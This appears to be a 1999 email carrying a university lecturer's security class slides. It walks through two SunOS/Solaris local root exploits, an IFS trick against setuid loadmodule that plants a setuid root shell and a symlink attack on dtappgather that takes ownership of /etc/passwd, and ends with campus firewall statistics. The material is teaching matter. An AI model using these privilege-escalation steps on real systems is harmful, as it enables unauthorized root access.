From ellenm@net.tamu.edu  Mon Mar 22 11:30:51 1999
Received: from net.tamu.edu (net.tamu.edu [128.194.177.1])
	by cs.tamu.edu (8.9.1/8.9.1) with ESMTP id LAA24464
	for <pooch@cs.tamu.edu>; Mon, 22 Mar 1999 11:30:50 -0600 (CST)
Received: from localhost (ellenm@localhost)
	by net.tamu.edu (8.8.8/8.8.8) with SMTP id LAA14040
	for <pooch@cs.tamu.edu>; Mon, 22 Mar 1999 11:31:33 -0600 (CST)
Message-Id: <199903221731.LAA14040@net.tamu.edu>
To: pooch@cs.tamu.edu
Subject: class notes
Date: Mon, 22 Mar 1999 11:31:32 -0600
From: Ellen L Mitchell <ellenm@net.tamu.edu>
Status: RO
Content-Length: 5420


Dr. Pooch,

Here are text copies of the slides from the class I lectured:


* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

Ellen Mitchell
March 11, 1999
for Dr. Pooch


IFS



Input Field Separator



Some programs don't protect from IFS



- Find something setuid that may have this vulnerability





~/[44]: ls -l /usr/openwin/bin/loadmodule

-rwsr-xr-x  1 root        24576 Jan 15  1994 loadmodule





/usr/openwin/bin [45]: strings - loadmodule | egrep `(popen|system)'

_system





Search for directory paths:



/usr/openwin/bin [46]: strings - loadmodule | grep \/

/usr/lib/ld.so

/dev/zero

crt0: no /usr/lib/ld.so

&crt0: /usr/lib/ld.so mapping failure

crt0: no /dev/zero

/usr/lang/SC1.0/cg87:/usr/lang/SC1.0:/usr/lang/SC1.0/ansi_lib

@(#)_crt1.S 1.6 91/02/11 SMI

/etc/openwin/modules

/usr/sys

/bin/sun4

/bin/sun4c

/bin/sun4m

%s/%s/%s/%s

%s/%s

/usr/etc/modload

/var/tmp/loadmodule.out

@(#)_crt2.c 1.4 91/02/11 SMI



















Create a file in your directory (world executable) called bin:

 



~/tmp[46]: cat >> bin

#!/bin/sh

IFS=" "

cp /bin/sh /var/foo

chmod 4755 /var/foo

^D







One way to use `loadmodule' is found in `xnews'.  

strings - xnews | grep loadm

./loadmodule winlock-`/bin/arch -k`.o winlockload >/dev/null

./loadmodule winlock-sun4.o winlockload







Change your IFS

setenv IFS=/



Put `.' first in your path

setenv PATH .:$PATH



Now that you have set your IFS, if you run any program which invokes `loadmodule', you can 
make it run your `bin' script.  Your script copies /bin/sh into /var/foo and makes it setuid root.

 

./loadmodule winlock-sun4.o winlockload

 



~[50]: /ls -l /var/foo

-rwsr-xr-x  1 root       106496  Jan 15  1994 foo



Run /var/foo:

/var/foo

#id

euid(0)

















Symbolic link problems

 

Buggy program:

        /usr/dt/bin/dtappgather

 

Description of the problem:

        Local users can change the ownership of any file, thus gaining

root priviledges. This happens because "dtappgather" does not check if the

file /var/dt/appconfig/appmanager/generic-display-0 is a symbolic link and

happily chown()s it to the user. When CERT released advisory CA-98.02

about /usr/dt/bin/dtappgather, I played a little with dtappgather and

discovered the problem above, but I thought that patch 104498-02 corrects it,

as described in SUN's section of 98.02. When I applied the patch, I

realised that it was still possible to gain root privs.

 

Systems Affected:

        *At least* SunOS 5.5 & 5.5.1 running CDE version 1.0.2 with suid

bit on /usr/dt/bin/dtappgather. SunOS 5.6 (or CDE 1.2) comes with

directory /var/dt/appconfig/appmanager/ mode 755 so it's not possible to

make the necessary link. On the other hand, in SunOS 5.5* this dir has

mode 777, so you can easily make the link or even unlink/rename the file

"generic-display-0" if exists owned by another user.

 

Quick Fix:

        chmod -s /usr/dt/bin/dtappgather

 

The Exploit:

        The forwarded exploit was initially posted to hack.gr's security

mailing list: "haxor".

 

 

Hack wisely,

Mastoras

 

        /*

         *  Computer Engineering & Informatics Department, Patras, Greece

         *  Mastor Wins, Fatality!      http://www.hack.gr/users/mastoras

         */

 

---------- Forwarded message ----------

Date: Sat, 24 Jan 1998 02:48:13 +0200 (EET)

From: Mastoras <mastoras@papari.hack.gr>

Reply-To: haxor@hack.gr

To: haxor@papari.hack.gr, Undisclosed recipients:  ;

Subject: [HAXOR:11] dtappgather exploit

 

Hello,

 

        I suppose you have learnt about CERT's advisory on dtappgather

program. Well, here's the exploit:

 

user@host% ls -l /etc/passwd

-r--r--r--   1 root     other        1585 Dec 17 22:26 /etc/passwd

user@host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0

user@host% dtappgather

MakeDirectory: /var/dt/appconfig/appmanager/generic-display-0: File exists

user@host% ls -l /etc/passwd

-r-xr-xr-x   1 user   buser      1585 Dec 17 22:26 /etc/passwd

user@host% echo "user wins! Fatality!" | mail root

 

        it would be easy to find the exploit if you had read CERT's advisory.

the following steps were enough..

 

% cp /usr/dt/bin/dtappgather .          [you can't "truss" suid proggies]

% truss -o koko ./dtappgather

% more koko

[ bad ld things ]

chown("/var/dt/appconfig/appmanager/generic-display-0", 666, 666) = 0

chmod("/var/dt/appconfig/appmanager/generic-display-0", 0555) = 0

[ shitty things ]

 

        I hope this was not too lame or well-known :-)

 

 

Seeya,

mastoras

































Firewall statistics 1992 vs. 1999



Today between us, UT and GSC we have 4 T3s (45 Mb/sec each)



Network Bandwidth:  T1 (1.5 Mb/sec) vs. T3 (45 Mb/sec)



Today we sustain 30 Mb/second traffic



Networked hosts:  12,000 (5,000 TCP/IP) vs 35,000 (at least 80% TCP/IP) today



Number of hosts in firewall config file:  approximately 30 hosts vs. approximately 1000 hosts 
today



Networked buildings:  60 vs. approximately 140 today



Transferred approximately:  4GB/day vs 84GB/day in, 42GB/day out today



DNS:  can handle 600 queries/second  (155 dns, 50 dns2, 20 dns3 per second)



Modems: 1632 today



DOS pentium 133 started dropping packets around 20 Mb/sec NDIS



Today:  FreeBSD, FDDI drivers

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *